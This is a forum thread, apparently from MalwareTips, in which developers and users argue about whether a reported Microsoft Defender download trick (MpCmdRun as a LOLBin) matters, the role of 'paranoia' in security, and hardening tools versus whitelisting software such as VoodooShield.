Microsoft Defender can ironically be used to download malware

[Andy Ful]

I am afraid that the only reasonable solution for people paranoid about computer security is learning how to be less paranoid. This cannot be accomplished by changing the security software after reading about new LOLBins, new fileless malware, new ransomware, new exploits, etc. Reading is not enough without proper understanding. The understanding will follow gradually when discussing the security problems with other members, software developers, security experienced users, etc.

 

[danb]

Honestly, defining paranoia in cybersecurity is really all about perspective. What some people define as being paranoid, others would define as being smart. No offense to anyone, but for example, my perspective of the system hardening tools is that they are all fulltime, static, overkill tweaking tools that make serious changes to the system, break vital system operations (such as the recent Intel driver update that we all saw), require undocumented hacks, some are an ancient deprecated tech that ultimately only offer user-space protection. In addition, if the user is unable to properly and effectively use the product on their own, and therefore requires assistance from an advanced user, or in the enterprise requires co-management of the web management console (by the cybersecurity vendor), many people would think this is ridiculous. So from my perspective, that is being paranoid and not smart about cybersecurity.

Then there are also tools that offer kind of a “half-lock” by somewhat hardening the system. From my perspective, these tools are just as ridiculous because any good AV has already added these rules and features, there is a high probability that the anti-exploit mechanism is not working properly, and to put it simply, malware does not discriminate. In other words, as a user, you are presented with tons of different rules, and you get to manually select which rules you wish to enforce because obviously you know what malware is going to attack you .

Then when it comes to VS, some people’s perspective is that it is overkill and only paranoid people should run VS. From the perspective of myself and the people who understand what VS is all about, they do not see using VS as paranoid at all. They and I believe that it is perfectly reasonable to lock the computer when it is at risk, and that there is never a good reason to run non-whitelisted executable code when the computer is at risk. We further believe that sealing up and securing every nook and cranny in your house while neglecting to lock the front door is absolutely insanity.

So ultimately, it really is all about perspective.

Anyway, all I have ever heard about VS is that it is overkill, but no one ever took the time to explain specifically why it is overkill and unnecessary, like I just did above. They just lazily suggest that VS is overkill without explaining why. So if anyone would like to explain this, I would love to hear your perspective on why you think locking the computer when it is at risk is overkill. And please, do not hold back, let me have it .

 

[Freki123]

*Getting popcorn* before it turns into an X vs Y discussion

 

[shmu26]

*Getting popcorn* before it turns into an X vs Y discussion

Yes, please order popcorn for all of us...

 

[Andy Ful]

Honestly, defining paranoia in cybersecurity is really all about perspective. What some people define as being paranoid, others would define as being smart.
...

Many MT members are "slightly paranoid" (quotes are important). It means that they try different security solutions by curiosity to discover something close to perfection. If we talk about real cybersecurity paranoia, it is caused by fear and there is nothing smart in it - also the perspective is wrong. I think that the right perspective can be established by learning the roots of fear. Anyway, I am not a psychiatrist so maybe there is another more correct explanation.

No offense to anyone, but for example, my perspective of the system hardening tools is that they are all fulltime, static, overkill tweaking tools that make serious changes to the system, break vital system operations (such as the recent Intel driver update that we all saw), require undocumented hacks, some are an ancient deprecated tech that ultimately only offer user-space protection.

That is true especially for home users who want to transfer the hardening used sometimes in enterprises (via GPO or reg tweaks). But, you slightly oversimplify the problem. One can apply light hardening which is perfectly documented by Microsoft and does not cause problems. Even Microsoft does it in WD via ASR rules. The point is to see the difference between overkill and advantage.
There is no place to discuss this problem here, because there are other more appropriate threads for that (for example the Hard_Configurator or SWH thread).

 

[danb]

Many MT members are "slightly paranoid" (quotes are important). It means that they try different security solutions by curiosity to discover something close to perfection. If we talk about real cybersecurity paranoia, it is caused by fear and there is nothing smart in it - also the perspective is wrong. I think that the right perspective can be established by learning the roots of fear. Anyway, I am not a psychiatrist so maybe there is another more correct explanation.


That is true especially for home users who want to transfer the hardening used sometimes in enterprises (via GPO or reg tweaks). But, you slightly oversimplify the problem. One can apply light hardening which is perfectly documented by Microsoft and does not cause problems. Even Microsoft does it in WD via ASR rules. The point is to see the difference between overkill and advantage.
There is no place to discuss this problem here, because there are other more appropriate threads for that (for example the Hard_Configurator or SWH thread).

In my opinion, psychology and "learning the roots of fear" has no place in cybersecurity... there are psychology forums for that. Even if it did, light hardening will probably be less effective in solving a user's security paranoia disorder as opposed to deny-by-default. Having said that, if someone here is qualified to diagnose someone's security paranoid disorder, then great, that would be an interesting new thread.

And trying different security solutions is how we gain a perspective and form and opinion on the various products.

 

[Andy Ful]

In my opinion, psychology and "learning the roots of fear" has no place in cybersecurity...
...

It has. The roots of such fear are usually related to insufficient knowledge about security threats. Reading the articles about new threats can increase cybersecurity paranoia. Learning about threats can have the opposite effect.
Changing the protection caused by fear only (after reading such articles) is an illusion of security.

 

[danb]

It has. The roots of such fear are usually related to insufficient knowledge about security threats. Reading the articles about new threats can increase cybersecurity paranoia. Learning about threats can have the opposite effect.
Changing the protection caused by fear only (after reading such articles) is an illusion of security.

How funny... if someone has a fear of flying, they do not read articles and research how the airplane security mechanisms protect them, right? .

I have worked directly with clients for 20 years now, so I have a very good understanding of how they view and understand cybersecurity. In a nutshell, they think AV's are a computer lock and they are immune to malware if they have an AV installed, otherwise they would not have asked me 500+ times over the years "I have antivirus software, how did I get a virus?".

Working with my clients for so long helped me to discover the concept of the toggling computer lock. VS was actually designed to provide the user comfort, and let them know their computer is locked when they are about ready to click on something they are unsure of. And when they asked me the above question that many times, I finally figured out that the best response I could give them was "your AV is a filter, it is not designed to catch every single threat." This is truly what VS is all about.

It is not an illusion of security if the computer is protected. Having said that, I will admit there is no such thing as bulletproof protection... but as you know, it is possible to lock things down pretty tight. The big question is... is the computer usable after it is locked down that tight .

Have a great weekend!

 

[SearchLight]

The best analogy to this ever ongoing debate is what I call the Toyota factor. If most reviews, and word of mouth endorsements say a Toyota is reliable, then most people will buy one because they don't want to be in for service often because it is proven.

I bet if WD wasn't bashed as often as it was in its infancy, and it still is, it would be more widely used today, and accepted like Avast or KSC for example. Unfortunately, the average PC user imo is also driven by a review, and reliability factor, and a set, and forget type of attitude.

If more people would say that WD is just as good as any other AV free or paid, then it would just boil down to personal preference as to how one could maneuver within the GUI.

Anyone wiling to make the statement?
.

 

[Andy Ful]

@danb,
Did you read my posts carefully? I am saying that it is not reasonable to change the security (I had initially in mind the VS) to its alternative, because of reading (not understanding) the article about the new LOLBin. In your posts, you are trying to convince me that I am wrong.
Look again at some posts starting from the below post:

Microsoft Defender can ironically be used to download malware

In other words, should we be concerned about this "vulnerability" in WD if we are using ConfigDef at HIGH? And just add VS to close all the "holes" in WD? It is not "vulnerability" in WD, but rather "vulnerability" in Windows - it will work with any AV installed. It does not also decrease the...

malwaretips.com

You are so touchy about the VS, that you sometimes fight the illusion.

 

[plat]

the average PC user imo is also driven by a review, and reliability factor, and a set, and forget type of attitude.

Hey, what's wrong with set-and-forget? I love it. This is my ever-elusive wish: to have Windows Security be set-and-forget and stay that way.

For justification for third party supplements for Defender (like VoodooShield, NVT SysHardener or Hard_Configurator), one need look no farther than the title of this thread. It's good sense. Too many people still view Defender like some kind of leprosy-infested pariah, to this very day. Defender is decent, but it ain't perfect out of the box. It's well-spent effort to beef it up. It can be done, pretty easily, with these tools. Ain't no paranoia around here.

Maybe instead of shopping for bulky, nosy antivirus products, let's go shopping and demo little-footprint Defender helpers. There are plenty around.

 

[danb]

The best analogy to this ever ongoing debate is what I call the Toyota factor. If most reviews, and word of mouth endorsements say a Toyota is reliable, then most people will buy one because they don't want to be in for service often because it is proven.

I bet if WD wasn't bashed as often as it was in its infancy, and it still is, it would be more widely used today, and accepted like Avast or KSC for example. Unfortunately, the average PC user imo is also driven by a review, and reliability factor, and a set, and forget type of attitude.

If more people would say that WD is just as good as any other AV free or paid, then it would just boil down to personal preference as to how one could maneuver within the GUI.

Anyone wiling to make the statement?
.

I totally agree! If you hear something enough times you will eventually believe it. Having said that, WD is making a comeback.

 

[danb]

@danb,
Did you read my posts carefully? I am saying that it is not reasonable to change the security (I had initially in mind the VS) to its alternative, because of reading (not understanding) the article about the new LOLBin. In your posts, you are trying to convince me that I am wrong.
Look again at some posts starting from the below post:

Microsoft Defender can ironically be used to download malware

In other words, should we be concerned about this "vulnerability" in WD if we are using ConfigDef at HIGH? And just add VS to close all the "holes" in WD? It is not "vulnerability" in WD, but rather "vulnerability" in Windows - it will work with any AV installed. It does not also decrease the...

malwaretips.com

You are so touchy about the VS, that you sometimes fight the illusion.

I understood you perfectly. You are suggesting that people spend a lot of their precious time to learn about cybersecurity so they can become better informed and they will no longer fear cyber attacks. That is great if someone has an interest, inclination and time to make cybersecurity a hobby or maybe eventually a profession. But guess what... 99.999%+ of all people do not have an interest, an inclination or the time to learn about cybersecurity... the just want to be protected. You are biased because cybersecurity is your hobby, so you think everyone should take up cybersecurity as a hobby. And actually, with all of the misinformation online, it is probably not a good idea for novices researching cybersecurity threats until they have a good understanding of cybersecurity… it actually sounds dangerous to me for them to do so.

I realized this when my dentist was working on my teeth and he was saying "Dan, if people would just do these simple things and take the time to learn a little more about their teeth, then we wouldn't have these problems." And I looked up at him and said, "Doc, no offense but you have zero interest in learning about computers." We both instantly realized that people only worry about and take care of what is important to them.

As for the people with severe security paranoia disorder... I am not a psychologist, but it would make sense to me that they use an iPad or Chromebook instead, until they can get over their fears. For example, I am afraid of heights... I do not study Newton's theory of Gravity, I just simply try to avoid heights as much as possible.

BTW, this has absolutely nothing to do with VS. This has to do with you steering people in a direction that aligns with your interests and objects. I would not say anything if they were being steered in a more protective direction, but they are being steered in a direction that could leave them vulnerable.

 

[vaccineboy]

Seriously @Andy Ful and @danb snap out of it. You guys make great products, but keep bickering at each other like 2 school girls.

 

[SpiderWeb]

This is why I don't get why people use AVs on phones either. It's a massive attack vector sending your files across the internet, some of those files contain your password and credentials for other programs... There is so little upside to having unsandboxed AVs enabled.

 

[JohnB]

It is not "vulnerability" in WD, but rather "vulnerability" in Windows - it will work with any AV installed. It does not also decrease the protection of ConfigureDefender HIGH settings. The number of malware that can download something via LOLBins from the remote location will not be much greater. It is as true as introducing the new kind of expensive vodka does not increase the number of drinkers (some drinkers will stop drinking the Polish vodka and start drinking MpCmdRun vodka).
Using VS will add some protection to this setup, just like without MpCmdRun.

Thanks for the info - Good to know.

 

[ForgottenSeer 85179]

This is why I don't get why people use AVs on phones either.

I told this many times now. Smartphones (Android + iOS) are more secure then desktop OS in many cases.

Chromebooks and Windows 10 Secured-core PCs are in right way to archive the same level, but the iPad is e.g. still better and get updates longer

 

[Andy Ful]

Seriously @Andy Ful and @danb snap out of it. You guys make great products, but keep bickering at each other like 2 school girls.

Please, remember that this thread has been made by @danb, so he is leading the discussion.
Anyone can discuss with him and answer his questions here. The thread will be probably finished if he will say so.


Please read this article: Microsoft refutes claims of Windows 10 Defender security problem